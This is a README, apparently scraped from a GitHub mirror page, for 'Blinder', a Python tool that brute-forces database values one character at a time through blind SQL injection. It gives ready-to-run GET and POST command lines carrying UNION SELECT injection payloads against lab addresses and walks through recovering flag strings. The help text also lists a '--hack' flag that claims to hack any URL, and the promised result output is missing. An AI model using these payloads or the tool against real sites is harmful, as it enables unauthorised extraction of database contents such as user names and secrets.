Blinder

Have you found a blind SQL injection? Great! Now you need to export it, but are you too lazy to sort through the values? Most likely, Blinder will help you!

Blinder is a tool that iterates through the values by letter. FUZZ is used to indicate the location of the search.

                      [HELP PAGE]
Usage: python3 blinder.py -u [URL] -v [GET/URL] -p [PARAMETERS]

Flags: 

[-h] [--help]: help page.
[--url] [-u]: url to target.
[-v] [--verbs]: HTTP verb (GET, POST, PUT and etc...).
[-p] [--parameters]: parameters for the target.
[-sl] [--show_length]: show response length.
[-il] [--incorrect_length]: size of incorrect length (for the filtration).
[-ec] [--exclude_characters]: Exclude characters from the fuzzing list. Specify sequentially in a line
   By default: [',&,%]
[-hg] [--hide-greeting]: Hide greeting.
[-ta] [--to-ascii]: Convert characters to ascii code.
[-ap] [--add-percent]: Add a percent sign to the end of FUZZ.
   In this mode, other characters can be added to the end of the line. These signs may be incorrect, due to the percentage.
[-tl] [--to-lower]: Convert letters to lowercase
[--hack]: Specify the URL of the target after the --hack flag, and it will be hacked.

GET request

Let's specify the URL through the flag [-u], and the verb through [-v]. Our request will look like this: . To make it work fine, add a percentage to the end of the line using the [-ap] flag. We want to see the length of the request. Let's add the [-sl] flag.

./blinder.py -u "http://192.168.0.100:7777/index.php?id=' union select id,name from users where name like 'FUZZ' -- -", -v GET  
-sl -ap

The end of result will be as follows:

We realized that the length 117 can be specified as incorrect. The letters will be converted to lowercase using the [-tl] flag, because we found upper and lower case letters. Specify the first letter m. In order for Blinder to fuzz recursively, we need to specify the wrong length 117 through [-ic] and remove the [-sl] flag.

/blinder.py -u "http://192.168.0.100:7777/index.php?id=' union select id,name from users where name like 'mFUZZ' -- -", -v GET -ap -il 117 -tl

Let's connect the letter m and the result of Blinder:

my_first_flag

POST request

In a post request, parameters are not passed through ?. There is a [-p] flag in Blinder for this request. We will specify the parameters using the [-p] flag. The rest of the flags, as in the get request.

./blinder.py -u "http://192.168.0.100:7777/index_post.php" -v POST -p "id=100' union select id,name from users where name like 'FUZZ' -- -" -sl -ap

The end of result will be as follows:

We realized that the length 184 can be specified as incorrect. The letters will be converted to lowercase using the [-tl] flag, because we found upper and lower case letters. Specify the first letter f. In order for Blinder to fuzz recursively, we need to specify the wrong length 184 through [-ic] and remove the [-sl] flag.

./blinder.py -u "http://192.168.0.100:7777/index_post.php" -v POST -p "id=100' union select id,name from users where name like 'fFUZZ' -- -" -il 184 -ap -tl

Let's connect the letter f and the result of Blinder:

flag

jaymanza / blinder Goto Github PK

blinder's Introduction

Blinder

GET request

POST request

blinder's People

Contributors

Recommend Projects

React

Vue.js

Typescript

TensorFlow

Django

Laravel

D3

Recommend Topics

javascript

web

server

Machine learning

Visualization

Game

Recommend Org

Facebook

Microsoft

Google

Alibaba

D3

Tencent